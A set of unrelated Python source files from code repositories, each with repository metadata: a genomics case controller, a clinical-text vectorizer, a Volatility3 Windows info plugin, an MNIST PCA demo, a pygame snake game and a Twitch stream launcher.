(collab['_id'] not in irrelevant_ids) and
(collab['_id'] not in case_obj['collaborators'])]
events = list(store.events(institute_obj, case=case_obj))
for event in events:
event['verb'] = VERBS_MAP[event['verb']]
data = {
'status_class': STATUS_MAP.get(case_obj['status']),
'other_causatives': store.check_causatives(case_obj),
'comments': store.events(institute_obj, case=case_obj, comments=True),
'hpo_groups': PHENOTYPE_GROUPS,
'events': events,
'suspects': suspects,
'causatives': causatives,
'collaborators': collab_ids,
'cohort_tags': COHORT_TAGS,
}
return data
def update_synopsis(store, institute_obj, case_obj, user_obj, new_synopsis):
"""Update synopsis."""
# create event only if synopsis was actually changed
if new_synopsis and case_obj['synopsis'] != new_synopsis:
link = url_for('cases.case', institute_id=institute_obj['_id'],
case_name=case_obj['display_name'])
store.update_synopsis(institute_obj, case_obj, user_obj, link,
content=new_synopsis)
def hpo_diseases(username, password, hpo_ids, p_value_treshold=1):
"""Return the list of HGNC symbols that match annotated HPO terms.
Args:
username (str): username to use for phenomizer connection
password (str): password to use for phenomizer connection
Returns:
query_result: a generator of dictionaries on the form
{
'p_value': float,
'disease_source': str,
'disease_nr': int,
'gene_symbols': list(str),
'description': str,
'raw_line': str
}
"""
# skip querying Phenomizer unless at least one HPO terms exists
try:
results = query_phenomizer.query(username, password, *hpo_ids)
diseases = [result for result in results
if result['p_value'] <= p_value_treshold]
return diseases
except SystemExit:
return None
def rerun(store, mail, current_user, institute_id, case_name, sender, recipient):
"""Request a rerun by email."""
institute_obj, case_obj = institute_and_case(store, institute_id, case_name)
user_obj = store.user(current_user.email)
link = url_for('cases.case', institute_id=institute_id, case_name=case_name)
store.request_rerun(institute_obj, case_obj, user_obj, link)
# this should send a JSON document to the SuSy API in the future
html = """
<p>{institute}: {case} ({case_id})</p>
<p>Re-run requested by: {name}</p>
""".format(institute=institute_obj['display_name'],
case=case_obj['display_name'], case_id=case_obj['_id'],
name=user_obj['name'].encode())
# compose and send the email message
msg = Message(subject=("SCOUT: request RERUN for {}"
.format(case_obj['display_name'])),
html=html, sender=sender, recipients=[recipient],
# cc the sender of the email for confirmation
cc=[user_obj['email']])
mail.send(msg)
| gitter-badger/scout | scout/server/blueprints/cases/controllers.py | controllers.py | py | 6,194 | python | en | code | null | github-code | 1 | [
{
"api_name": "scout.constants.CASE_STATUSES",
"line_number": 19,
"usage_type": "name"
},
{
"api_name": "scout.constants.CASE_STATUSES",
"line_number": 29,
"usage_type": "name"
},
{
"api_name": "itertools.chain",
"line_number": 58,
"usage_type": "call"
},
{
"api_n... |
15362469033 | import click
import numpy as np
from sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer
def get_wiki_vocab(file):
"""
Build a vocabulary from Wikipedia articles.
Parameters
----------
file : str
File path to Wikipedia article text
Returns
-------
dict
Dictionary of words and their frequencies
"""
vocab = {}
with open(file, 'r', encoding='utf-8') as f:
line = f.readline()
while line:
if line[0:3]!='XXX':
line=line.strip('\n').split()
for token in line:
vocab[token.lower()] = vocab.get(token.lower(), 0) + 1
line=f.readline()
return vocab
def get_notes_vocab(file):
"""
Build a vocabulary from MIMIC notes text.
Parameters
----------
file : str
File path to combined_dataset from 1_preprocess_mimic.py
Returns
-------
dict
Dictionary of words and their frequencies
"""
vocab = {}
with open(file, 'r', encoding='utf-8') as f:
line = f.readline()
while line:
line = line.strip('\n').split()
if line[0] == 'codes:':
line = f.readline()
line = line.strip('\n').split()
if line[0] == 'notes:':
line = f.readline()
while line != 'end!\n':
line = line.strip('\n').split()
for token in line:
vocab[token.lower()] = vocab.get(token.lower(), 0) + 1
line = f.readline()
line = f.readline()
return vocab
def docs_to_strings(documents):
"""
Convert a list of lists of tokens to a list of strings.
Parameters
----------
documents : list
List of lists of tokens
Returns
-------
list
List of strings
"""
data = []
for doc in documents:
text = ''
for token in doc:
text += token + ' '
data.append(text)
return data
def get_wiki_documents(file, vocab):
"""
Get a list of lists of tokens from Wikipedia articles.
Parameters
----------
file : str
File path to Wikipedia article texts
vocab : dict
Dictionary of words and their frequencies
Returns
-------
list
List of lists of tokens
"""
documents = []
with open(file, 'r', encoding='utf-8') as f:
line = f.readline()
while line:
if line[0:4] == 'XXXd':
doc = []
line = f.readline()
while line[0:4] != 'XXXe':
line = line.strip('\n').split()
for token in line:
if token.lower() in vocab:
doc.append(token.lower())
line = f.readline()
documents.append(doc)
line = f.readline()
return documents
def get_notes(file, vocab):
"""
Get a list of lists of tokens from MIMIC notes.
Parameters
----------
file : str
File path to combined_dataset from 1_preprocess_mimic.py
vocab : dict
Dictionary of words and their frequencies
Returns
-------
list
List of lists of tokens
"""
documents = []
with open(file, 'r', encoding='utf-8') as f:
line = f.readline()
while line:
line = line.strip('\n').split()
if line[0] == 'codes:':
line = f.readline()
line = line.strip('\n').split()
if line[0] == 'notes:':
doc = []
line = f.readline()
while line != 'end!\n':
line = line.strip('\n').split()
for token in line:
if token.lower() in vocab:
doc.append(token)
line = f.readline()
documents.append(doc)
line = f.readline()
return documents
def vectorize(data, output_file, vectorizer):
"""
Apply a vectorizer to a list of strings.
Parameters
----------
data : list
List of strings
output_file : str
File path to save vectorized data
vectorizer : sklearn.feature_extraction.text.CountVectorizer or sklearn.feature_extraction.text.TfidfVectorizer
Vectorizer to apply
"""
embed = vectorizer.fit_transform(data)
embed = embed.A
embed = np.array(embed, dtype=float)
np.save(output_file, embed)
def process_data(file_wiki,
file_mimic,
output_wiki,
output_mimic,
vectorizer_type):
wiki_vocab = get_wiki_vocab(file_wiki)
note_vocab = get_notes_vocab(file_mimic)
vocab = set(note_vocab.keys()).intersection(set(wiki_vocab.keys()))
wiki_docs = get_wiki_documents(file_wiki, vocab)
notes = get_notes(file_mimic, vocab)
vocab_map = {}
for note in notes:
for token in note:
if token.lower() not in vocab_map.keys():
vocab_map[token.lower()] = len(vocab_map)
wiki_docs = docs_to_strings(wiki_docs)
notes = docs_to_strings(notes)
if vectorizer_type == 'binary':
vectorizer = CountVectorizer(min_df=1, vocabulary=vocab_map, binary=True)
elif vectorizer_type == 'count':
vectorizer = TfidfVectorizer(min_df=1, vocabulary=vocab_map, use_idf=False)
elif vectorizer_type == 'tfidf':
vectorizer = TfidfVectorizer(min_df=1, vocabulary=vocab_map)
vectorize(wiki_docs, output_wiki, vectorizer)
vectorize(notes, output_mimic, vectorizer)
@click.command()
@click.option('--file_wiki', default='data/wikipedia_knowledge')
@click.option('--file_mimic', default='data/combined_dataset')
@click.option('--output_wiki', default='data/wikivec')
@click.option('--output_mimic', default='data/notevec')
@click.option('--vectorizer_type', default='binary', type=click.Choice(['binary', 'count', 'tfidf']))
def process_data_(file_wiki,
file_mimic,
output_wiki,
output_mimic,
vectorizer_type):
process_data(file_wiki,
file_mimic,
output_wiki,
output_mimic,
vectorizer_type)
if __name__ == "__main__":
process_data_()
| bllguo/KSI | vectorize_data.py | vectorize_data.py | py | 6,602 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "numpy.array",
"line_number": 177,
"usage_type": "call"
},
{
"api_name": "numpy.save",
"line_number": 178,
"usage_type": "call"
},
{
"api_name": "sklearn.feature_extraction.text.CountVectorizer",
"line_number": 204,
"usage_type": "call"
},
{
"api_nam... |
36170482691 | import time
from typing import List, Tuple, Iterable
from volatility3.framework import constants, interfaces, layers, symbols
from volatility3.framework.configuration import requirements
from volatility3.framework.interfaces import plugins
from volatility3.framework.renderers import TreeGrid
from volatility3.framework.symbols import intermed
from volatility3.framework.symbols.windows import extensions
class Info(plugins.PluginInterface):
"""Show OS & kernel details of the memory sample being analyzed."""
_required_framework_version = (2, 0, 0)
_version = (1, 0, 0)
@classmethod
def get_requirements(cls) -> List[interfaces.configuration.RequirementInterface]:
return [
requirements.ModuleRequirement(
name="kernel",
description="Windows kernel",
architectures=["Intel32", "Intel64"],
),
]
@classmethod
def get_depends(
cls,
context: interfaces.context.ContextInterface,
layer_name: str,
index: int = 0,
) -> Iterable[Tuple[int, interfaces.layers.DataLayerInterface]]:
"""List the dependencies of a given layer.
Args:
context: The context to retrieve required layers from
layer_name: the name of the starting layer
index: the index/order of the layer
Returns:
An iterable containing the levels and layer objects for all dependent layers
"""
layer = context.layers[layer_name]
yield index, layer
try:
for depends in layer.dependencies:
for j, dep in cls.get_depends(context, depends, index + 1):
yield j, context.layers[dep.name]
except AttributeError:
# FileLayer won't have dependencies
pass
@classmethod
def get_kernel_module(
cls,
context: interfaces.context.ContextInterface,
layer_name: str,
symbol_table: str,
):
"""Returns the kernel module based on the layer and symbol_table"""
virtual_layer = context.layers[layer_name]
if not isinstance(virtual_layer, layers.intel.Intel):
raise TypeError("Virtual Layer is not an intel layer")
kvo = virtual_layer.config["kernel_virtual_offset"]
ntkrnlmp = context.module(symbol_table, layer_name=layer_name, offset=kvo)
return ntkrnlmp
@classmethod
def get_kdbg_structure(
cls,
context: interfaces.context.ContextInterface,
config_path: str,
layer_name: str,
symbol_table: str,
) -> interfaces.objects.ObjectInterface:
"""Returns the KDDEBUGGER_DATA64 structure for a kernel"""
ntkrnlmp = cls.get_kernel_module(context, layer_name, symbol_table)
native_types = context.symbol_space[symbol_table].natives
kdbg_offset = ntkrnlmp.get_symbol("KdDebuggerDataBlock").address
kdbg_table_name = intermed.IntermediateSymbolTable.create(
context,
interfaces.configuration.path_join(config_path, "kdbg"),
"windows",
"kdbg",
native_types=native_types,
class_types=extensions.kdbg.class_types,
)
kdbg = context.object(
kdbg_table_name + constants.BANG + "_KDDEBUGGER_DATA64",
offset=ntkrnlmp.offset + kdbg_offset,
layer_name=layer_name,
)
return kdbg
@classmethod
def get_kuser_structure(
cls,
context: interfaces.context.ContextInterface,
layer_name: str,
symbol_table: str,
) -> interfaces.objects.ObjectInterface:
"""Returns the _KUSER_SHARED_DATA structure for a kernel"""
virtual_layer = context.layers[layer_name]
if not isinstance(virtual_layer, layers.intel.Intel):
raise TypeError("Virtual Layer is not an intel layer")
ntkrnlmp = cls.get_kernel_module(context, layer_name, symbol_table)
# this is a hard-coded address in the Windows OS
if virtual_layer.bits_per_register == 32:
kuser_addr = 0xFFDF0000
else:
kuser_addr = 0xFFFFF78000000000
kuser = ntkrnlmp.object(
object_type="_KUSER_SHARED_DATA",
layer_name=layer_name,
offset=kuser_addr,
absolute=True,
)
return kuser
@classmethod
def get_version_structure(
cls,
context: interfaces.context.ContextInterface,
layer_name: str,
symbol_table: str,
) -> interfaces.objects.ObjectInterface:
"""Returns the KdVersionBlock information from a kernel"""
ntkrnlmp = cls.get_kernel_module(context, layer_name, symbol_table)
vers_offset = ntkrnlmp.get_symbol("KdVersionBlock").address
vers = ntkrnlmp.object(
object_type="_DBGKD_GET_VERSION64",
layer_name=layer_name,
offset=vers_offset,
)
return vers
@classmethod
def get_ntheader_structure(
cls,
context: interfaces.context.ContextInterface,
config_path: str,
layer_name: str,
) -> interfaces.objects.ObjectInterface:
"""Gets the ntheader structure for the kernel of the specified layer"""
virtual_layer = context.layers[layer_name]
if not isinstance(virtual_layer, layers.intel.Intel):
raise TypeError("Virtual Layer is not an intel layer")
kvo = virtual_layer.config["kernel_virtual_offset"]
pe_table_name = intermed.IntermediateSymbolTable.create(
context,
interfaces.configuration.path_join(config_path, "pe"),
"windows",
"pe",
class_types=extensions.pe.class_types,
)
dos_header = context.object(
pe_table_name + constants.BANG + "_IMAGE_DOS_HEADER",
offset=kvo,
layer_name=layer_name,
)
nt_header = dos_header.get_nt_header()
return nt_header
def _generator(self):
kernel = self.context.modules[self.config["kernel"]]
layer_name = kernel.layer_name
symbol_table = kernel.symbol_table_name
layer = self.context.layers[layer_name]
table = self.context.symbol_space[symbol_table]
kdbg = self.get_kdbg_structure(
self.context, self.config_path, layer_name, symbol_table
)
yield (0, ("Kernel Base", hex(layer.config["kernel_virtual_offset"])))
yield (0, ("DTB", hex(layer.config["page_map_offset"])))
yield (0, ("Symbols", table.config["isf_url"]))
yield (
0,
("Is64Bit", str(symbols.symbol_table_is_64bit(self.context, symbol_table))),
)
yield (
0,
("IsPAE", str(self.context.layers[layer_name].metadata.get("pae", False))),
)
for i, layer in self.get_depends(self.context, layer_name):
yield (0, (layer.name, f"{i} {layer.__class__.__name__}"))
if kdbg.Header.OwnerTag == 0x4742444B:
yield (0, ("KdDebuggerDataBlock", hex(kdbg.vol.offset)))
yield (0, ("NTBuildLab", kdbg.get_build_lab()))
yield (0, ("CSDVersion", str(kdbg.get_csdversion())))
vers = self.get_version_structure(self.context, layer_name, symbol_table)
yield (0, ("KdVersionBlock", hex(vers.vol.offset)))
yield (0, ("Major/Minor", f"{vers.MajorVersion}.{vers.MinorVersion}"))
yield (0, ("MachineType", str(vers.MachineType)))
ntkrnlmp = self.get_kernel_module(self.context, layer_name, symbol_table)
cpu_count_offset = ntkrnlmp.get_symbol("KeNumberProcessors").address
cpu_count = ntkrnlmp.object(
object_type="unsigned int", layer_name=layer_name, offset=cpu_count_offset
)
yield (0, ("KeNumberProcessors", str(cpu_count)))
kuser = self.get_kuser_structure(self.context, layer_name, symbol_table)
yield (0, ("SystemTime", str(kuser.SystemTime.get_time())))
yield (
0,
(
"NtSystemRoot",
str(
kuser.NtSystemRoot.cast(
"string", encoding="utf-16", errors="replace", max_length=260
)
),
),
)
yield (0, ("NtProductType", str(kuser.NtProductType.description)))
yield (0, ("NtMajorVersion", str(kuser.NtMajorVersion)))
yield (0, ("NtMinorVersion", str(kuser.NtMinorVersion)))
# yield (0, ("KdDebuggerEnabled", "True" if kuser.KdDebuggerEnabled else "False"))
# yield (0, ("SafeBootMode", "True" if kuser.SafeBootMode else "False"))
nt_header = self.get_ntheader_structure(
self.context, self.config_path, layer_name
)
yield (
0,
(
"PE MajorOperatingSystemVersion",
str(nt_header.OptionalHeader.MajorOperatingSystemVersion),
),
)
yield (
0,
(
"PE MinorOperatingSystemVersion",
str(nt_header.OptionalHeader.MinorOperatingSystemVersion),
),
)
yield (0, ("PE Machine", str(nt_header.FileHeader.Machine)))
yield (
0,
(
"PE TimeDateStamp",
time.asctime(time.gmtime(nt_header.FileHeader.TimeDateStamp)),
),
)
def run(self):
return TreeGrid([("Variable", str), ("Value", str)], self._generator())
| volatilityfoundation/volatility3 | volatility3/framework/plugins/windows/info.py | info.py | py | 9,625 | python | en | code | 1,879 | github-code | 1 | [
{
"api_name": "volatility3.framework.interfaces.plugins.PluginInterface",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "volatility3.framework.interfaces.plugins",
"line_number": 12,
"usage_type": "name"
},
{
"api_name": "volatility3.framework.configuration.requir... |
87462737 | # https://skyeong.net/186
import numpy as np
from sklearn.datasets import fetch_openml
mnist = fetch_openml("MNIST_784")
X = mnist.data / 255.0
y = mnist.target
print (X.shape, y.shape)
import pandas as pd
feat_cols = ['pixel'+str(i) for i in range(X.shape[1]) ]
df = pd.DataFrame(X,columns=feat_cols)
df['label'] = y
df['label'] = df['label'].apply(lambda i: str(i))
X, y = None, None
print( 'Size of the dataframe: {}'.format(df.shape) )
rndperm = np.random.permutation(df.shape[0])
import matplotlib.pyplot as plt
# Plot the graph
plt.gray()
fig = plt.figure( figsize=(16,7) )
for i in range(0,30):
ax = fig.add_subplot(3,10,i+1,title='Digit: ' + str(df.loc[rndperm[i], 'label']) )
ax.matshow(df.loc[rndperm[i], feat_cols].values.reshape((28,28)).astype(float))
plt.show()
from sklearn.decomposition import PCA
pca = PCA(n_components=3)
pca_result = pca.fit_transform(df[feat_cols].values)
df['pca-one'] = pca_result[:,0]
df['pca-two'] = pca_result[:,1]
df['pca-three'] = pca_result[:,2]
print( 'Explained variation per principle component: {}'.format(pca.explained_variance_ratio_)) | humanscape-sean/TSNE-on-Video-Iframes | tsne_mnist_example.py | tsne_mnist_example.py | py | 1,113 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "sklearn.datasets.fetch_openml",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "pandas.DataFrame",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "numpy.random.permutation",
"line_number": 26,
"usage_type": "call"
},
{
"api_name":... |
11435870647 | # TEORIA:
'''
# importa o pygame
import pygame
# inicializa o modulo do pygame
pygame.init()
# definindo o tamanho da tela para o Pygame
dis_width = 600 # largura
dis_height = 400 # altura
dis = pygame.display.set_mode((dis_width,dis_height))
red = (219, 31, 31)
green = (44, 219, 31)
squareSize = 20
circleRadius = 10
positionX = 200
positionY = 100
# definindo um título que irá aparecer na janela
pygame.display.set_caption('Primeiro jogo')
# função que será o loop do jogo a ser desenvolvido
def gameLoop():
gameOver = False
while not gameOver:
pygame.display.update()
# captura as teclas que foram pressionadas
for event in pygame.event.get():
# verifica se o evento foi um evento para finalizar
if event.type == pygame.QUIT:
# marcamos que o jogo foi finalizado para sari do loop
gameOver = True
# desenha um retangulo
pygame.draw.rect(dis,red,[positionX,positionY,squareSize,squareSize])
# desenha um circulo
pygame.draw.circle(dis,green,(positionX+200,positionY),circleRadius)
# saindo do jogo
pygame.quit()
# # loop principal que ira rodar o jogo
# while True:
# continue
# chamamos a função para executar o nosso gameLoop
gameLoop()
'''
# Cobra
import pygame
import random
pygame.init()
pygame.display.init()
pygame.font.init()
azul = (50, 100, 213)
laranja = (205, 102, 0)
verde = (0, 255, 0)
amarelo = (255,255,102)
dimensoes = (600, 600)
### VALORES INICIAIS ###
x = 300
y = 300
d = 20
lista_cobra = [[x, y]]
dx = 0
dy = 0
x_comida = round(random.randrange(0, 600 - d) / 20) * 20
y_comida = round(random.randrange(0, 600 - d) / 20) * 20
# fonte = pygame.font.Font(None,35)
tela = pygame.display.set_mode((dimensoes))
pygame.display.set_caption('Snake da Kenzie')
tela.fill(azul)
clock = pygame.time.Clock()
def desenha_cobra(lista_cobra):
tela.fill(azul)
for unidade in lista_cobra:
pygame.draw.rect(tela, laranja, [unidade[0], unidade[1], d, d])
def mover_cobra(dx, dy, lista_cobra):
for event in pygame.event.get():
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_LEFT:
dx = -d
dy = 0
elif event.key == pygame.K_RIGHT:
dx = d
dy = 0
elif event.key == pygame.K_UP:
dx = 0
dy = -d
elif event.key == pygame.K_DOWN:
dx = 0
dy = d
x_novo = lista_cobra[-1][0] + dx
y_novo = lista_cobra[-1][1] + dy
lista_cobra.append([x_novo, y_novo])
del lista_cobra[0]
return dx, dy, lista_cobra
def verifica_comida(dx, dy, x_comida, y_comida, lista_cobra):
head = lista_cobra[-1]
x_novo = head[0] + dx
y_novo = head[1] + dy
if head[0] == x_comida and head[1] == y_comida:
lista_cobra.append([x_novo, y_novo])
x_comida = round(random.randrange(0, 600 - d) / 20) * 20
y_comida = round(random.randrange(0, 600 - d) / 20) * 20
pygame.draw.rect(tela, verde, [x_comida, y_comida, d, d])
return x_comida, y_comida, lista_cobra
def verifica_parede(lista_cobra):
head = lista_cobra[-1]
x = head[0]
y = head[1]
if x not in range(600) or y not in range(600):
raise Exception
def verifica_mordeu(lista_cobra):
head = lista_cobra[-1]
corpo = lista_cobra.copy()
del corpo[-1]
for x,y in corpo:
if x == head[0] and y == head[1]:
raise Exception
def atualizar_pontos(lista_cobra):
pts = str(len(lista_cobra)-1)
escore = fonte.render("Pontuação: " + pts, True, amarelo)
tela.blit(score,[1,1])
while True:
pygame.display.update()
desenha_cobra(lista_cobra)
dx, dy, lista_cobra = mover_cobra(dx, dy, lista_cobra)
x_comida, y_comida, lista_cobra = verifica_comida(
dx, dy, x_comida, y_comida, lista_cobra)
print(lista_cobra)
verifica_parede(lista_cobra)
verifica_mordeu(lista_cobra)
# atualizar_pontos(lista_cobra)
clock.tick(12)
'''
# TEORIA
import pygame
red = (219,31,31)
black = (0,0,0)
squareSize = 20
# vai ser utilizado para determinar quantos frames por segundo
clock = pygame.time.Clock()
# velocidade que o nosso desenha irá se mover
speed = 10
disWidth = 600
disHeight = 400
dis = pygame.display.set_mode((disWidth,disHeight))
pygame.display.set_caption('Meu jogo')
scoreFont = pygame.font.SysFont('/usr/share/fonts/truetype/freefont/FreeSans.ttf',35)
player = pygame.image.load('/home/fdmedina/Imagens/Crop Captura de tela de 2021-04-23 20-32-17.png')
playerRect = player.get_rect()
charSpeed = [speed,speed]
def verifyGameBounds(positionX,positionY):
if positionY > (disHeight - squareSize):
positionY = disHeight - squareSize
if positionY < 0:
positionY = 0
if positionX > (disWidth - squareSize):
positionX = disWidth - squareSize
if positionX < 0:
positionX = 0
return (positionX,positionY)
def gameLoop():
gameOver = False
# posição inicial
positionX = disWidth / 2
positionY = disHeight / 2
# # usaremos para controlar a movimentação
x1Change = 0
y1Change = 0
score = 100
while not gameOver:
displayScore(score)
pygame.display.update()
# # usaremos para controlar a movimentação
# x1Change = 0
# y1Change = 0
for event in pygame.event.get():
if event.type == pygame.QUIT:
gameOver = True
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_LEFT or event.key == pygame.K_a:
x1Change = -speed
y1Change = 0
elif event.key == pygame.K_RIGHT or event.key == pygame.K_d:
x1Change = speed
y1Change = 0
elif event.key == pygame.K_UP or event.key == pygame.K_w:
x1Change = 0
y1Change = -speed
elif event.key == pygame.K_DOWN or event.key == pygame.K_s:
x1Change = 0
y1Change = speed
if event.type == pygame.KEYUP:
if event.key == pygame.K_UP or event.key == pygame.K_DOWN or event.key == pygame.K_w or event.key == pygame.K_s:
y1Change = 0
if event.key == pygame.K_RIGHT or event.key == pygame.K_LEFT or event.key == pygame.K_d or event.key == pygame.K_a:
x1Change = 0
dis.fill(black)
pygame.draw.rect(dis, red, [positionX,positionY,squareSize,squareSize])
positionX += x1Change
positionY += y1Change
positionX,positionY = verifyGameBounds(positionX,positionY)
# utilizando o speed para alterar o posicionamento do retangulo
# positionY += speed
pygame.display.update()
# definindo para ser 10 frames por segundo no maximo
clock.tick(speed)
pygame.quit()
def displayScore(score):
msgScore = scoreFont.render('Your score: ' + str(score),True,yellow)
dis.blit(msgScore,[0,0])
# chamamos a função para executar o nosso gameLoop
gameLoop()
''' | fabiodm7/stuPy | intro/game.py | game.py | py | 7,319 | python | pt | code | 0 | github-code | 1 | [
{
"api_name": "pygame.init",
"line_number": 60,
"usage_type": "call"
},
{
"api_name": "pygame.display.init",
"line_number": 61,
"usage_type": "call"
},
{
"api_name": "pygame.display",
"line_number": 61,
"usage_type": "attribute"
},
{
"api_name": "pygame.font.init"... |
24657287989 | from django.db import models
# Create your models here.
class Category(models.Model):
name = models.CharField(max_length=200)
class Product(models.Model):
title = models.CharField(max_length=300)
description = models.TextField()
price = models.DecimalField(decimal_places=2, max_digits=10)
image = models.TextField(blank=True, null=True)
category = models.IntegerField()
ratings = models.DecimalField(max_digits=10, decimal_places=2)
count = models.IntegerField()
| AbhishekBose89/Asssignment35-Q1-AbhishekBose | shoplane/restapi/models.py | models.py | py | 500 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "django.db.models.Model",
"line_number": 5,
"usage_type": "attribute"
},
{
"api_name": "django.db.models",
"line_number": 5,
"usage_type": "name"
},
{
"api_name": "django.db.models.CharField",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "... |
28986490606 | import sqlite3
class SQLiteProfileImage():
def __init__(self):
def dict_factory(cursor, row):
d = {}
for idx, col in enumerate(cursor.description):
d[col[0]] = row[idx]
return d
dbname = "/sqlite/profile_image.db"
self.conn = sqlite3.connect(dbname)
self.conn.row_factory = dict_factory
cur = self.conn.cursor()
cur.execute("""
CREATE TABLE IF NOT EXISTS USER_PROFILE_IMAGES(
E_MAIL STRING,
profile_image_url STRING NOT NULL,
PRIMARY KEY(E_MAIL)
)
""")
def end(self):
self.conn.close()
def replace(self, e_mail, profile_image_url):
cur = self.conn.cursor()
sql = f'replace into USER_PROFILE_IMAGES values("{e_mail}", "{profile_image_url}")'
try:
cur.execute(sql)
self.conn.commit()
except:
self.conn.close()
return False
self.conn.close()
return True
def fetch(self, e_mail):
cur = self.conn.cursor()
cur.execute(f'SELECT * FROM USER_PROFILE_IMAGES WHERE e_mail="{e_mail}"')
try:
result = cur.fetchall()[0]
except:
return None
self.conn.close()
return result
| minegishirei/flamevalue | trashbox/django3/app/flamevalue/my_SQLite_Profile.py | my_SQLite_Profile.py | py | 1,326 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "sqlite3.connect",
"line_number": 12,
"usage_type": "call"
}
] |
72933516193 | # *_* coding : UTF-8 *_*
# author : Leemamas
# 开发时间 : 2021/9/28 0:30
import pygame
class Cointext():
def __init__(self,rect,reward,bshape):
self.images = [pygame.image.load('images/coinText.png').subsurface(i*36, 0, 36, 49) for i in range(0, 11)]
self.rect=rect
self.reward=reward
self.bshape=bshape
def display(self, screen):
count=0
for i in self.change((self.reward*self.bshape)):
screen.blit(self.images[i], (self.rect[0]+count*36,self.rect[1]))
count+=1
def change(self, number):
l = list(map(int, str(number)))
##每个数字前插入X
l.insert(0,10)
return l | leemamas/fishgame | coinText.py | coinText.py | py | 701 | python | en | code | 8 | github-code | 1 | [
{
"api_name": "pygame.image.load",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "pygame.image",
"line_number": 8,
"usage_type": "attribute"
}
] |
39077417661 | import os
import requests
from bs4 import BeautifulSoup
from concurrent.futures import ThreadPoolExecutor
os.system("mode con cols=130 lines=4")
user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'
headers = {
'User-Agent': user_agent
}
def get_hero():
hero_name = []
hero_links = []
url = 'https://www.dotabuff.com/heroes'
response = requests.get(url, headers=headers, timeout=5)
html = response.content
soup = BeautifulSoup(html, 'html.parser')
links_temp = soup.select(".hero-grid a[href]")
for link in links_temp:
hero_links.append(link["href"])
for name in soup.find_all(class_="name"):
hero_name.append(name.text.strip())
return hero_name, hero_links
def scrape_hero(hero, link):
url = 'https://www.dotabuff.com'+link+'/counters'
response = requests.get(url, headers=headers, timeout=5)
html = response.content
soup = BeautifulSoup(html, 'lxml')
data = []
for tr in soup.find_all('tr'):
hero_name_elem = tr.find('td', {'class': 'cell-xlarge'})
if hero_name_elem:
hero_name = hero_name_elem.find('a').text
score = float(tr.find_all('td')[2].text.strip('%'))
win_rate = float(tr.find_all('td')[3].text.strip('%'))
data.append((score, hero_name, win_rate))
for i in range(len(data)):
score, hero_name, win_rate = data[i]
score = -score
data[i] = (score, hero_name, win_rate)
min_score = min([x[0] for x in data])
for i in range(len(data)):
score, hero_name, win_rate = data[i]
score += -min_score
data[i] = (score, hero_name, win_rate)
with open(f'database/{hero}.txt', 'w') as f:
for win_rate, hero_name, score in data:
f.write(f'{hero_name}: {score:.2f}, {win_rate}\n')
if __name__ == '__main__':
os.makedirs('database', exist_ok=True)
hero_names, links = get_hero()
with open("database/Heroes.txt", "w") as file:
for item in hero_names:
file.write(item + "\n")
total = len(links)
count = 0
with ThreadPoolExecutor(max_workers=10) as executor:
for link in links:
executor.submit(scrape_hero, hero_names[count], link)
os.system("cls")
print('by Rizeru')
count += 1
progress = int(count / total * 100)
bar = '[' + '#' * progress + ' ' * (100 - progress) + ']'
print(f'Progress: {bar} {progress}% ({count}/{total})')
if count == total:
print('Recording...')
| ElRizeru/dota2picker | update.py | update.py | py | 2,657 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "os.system",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "bs4.BeautifulSoup",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_numb... |
25476839440 | #!/usr/bin/env python3
import re
import json
from pprint import pprint
from argparse import ArgumentParser
from json import JSONDecodeError
from subprocess import call
import urllib
from os.path import expanduser
from urllib.parse import urlparse
import requests
import sys
from past.builtins import raw_input
# call watch() if no arguments are supplied
WATCH_AS_DEFAULT = True
class Twitch(object):
_channel_list = []
_storage_file = expanduser("~/.twitch-channels")
def __init__(self):
self.load_channels()
def load_channels(self):
try:
self._channel_list = json.load(open(self._storage_file, 'r'))
except (JSONDecodeError, FileNotFoundError):
self.save_channels()
def save_channels(self):
json.dump(self._channel_list, open(self._storage_file, 'w'))
def add_channel(self, name: str):
name = name.lower()
if name not in self._channel_list:
self._channel_list.append(name.lower())
self.save_channels()
return True
else:
return False
def remove_channel(self, name: str):
if name in self._channel_list:
self._channel_list.remove(name.lower())
self.save_channels()
return True
else:
return False
@property
def channels(self):
return self._channel_list
def query_streams(channel_list):
print("Looking for currently streaming channels...")
online_streams = []
for channel in channel_list:
url = 'https://api.twitch.tv/kraken/streams/' + channel
response = requests.get(url)
# try:
s = response.json()
s = s["stream"] if "stream" in s else None
if not s:
continue
stream_url = s["channel"]["url"]
streamer = s["channel"]["display_name"]
game = s["game"]
stream_desc = s["channel"]["status"]
online_streams.append({'name': streamer, 'url': stream_url, 'game': game, 'desc': stream_desc})
return online_streams
def watch(streams):
if len(streams) > 0:
print("Channels online:")
i = 1
for s in streams:
print("({}) {}: [{}] {}".format(i, s['name'], s['game'], s['desc']))
print("{} {}".format(' ' * (2 + len(str(i))), s['url']))
i += 1
while True:
print()
input = raw_input("Enter number of stream to watch: ")
try:
stream_number = int(input)
break
except ValueError:
print("Please specify the number of the stream to watch.")
continue
command = "livestreamer {} best".format(streams[stream_number - 1]['url'])
call(command.split(), shell=False)
else:
print("No streams online.")
def main():
parser = ArgumentParser(
description="Add twitch channels and watch them directly with your native video application.")
parser.add_argument("watch", nargs='?', help="Start watching streams!")
parser.add_argument("-a", "--add", help="Add one or more channels by name or twitch url", type=str, nargs='+')
parser.add_argument("-r", "--remove", help="Remove one or more channels by name", type=str, nargs='+')
parser.add_argument("-l", "--list", help="List all added channels", action='store_true')
args = parser.parse_args()
twitch = Twitch()
if args.add:
for channel in args.add:
parsed = urlparse(channel)
is_url = bool(parsed.scheme)
if is_url:
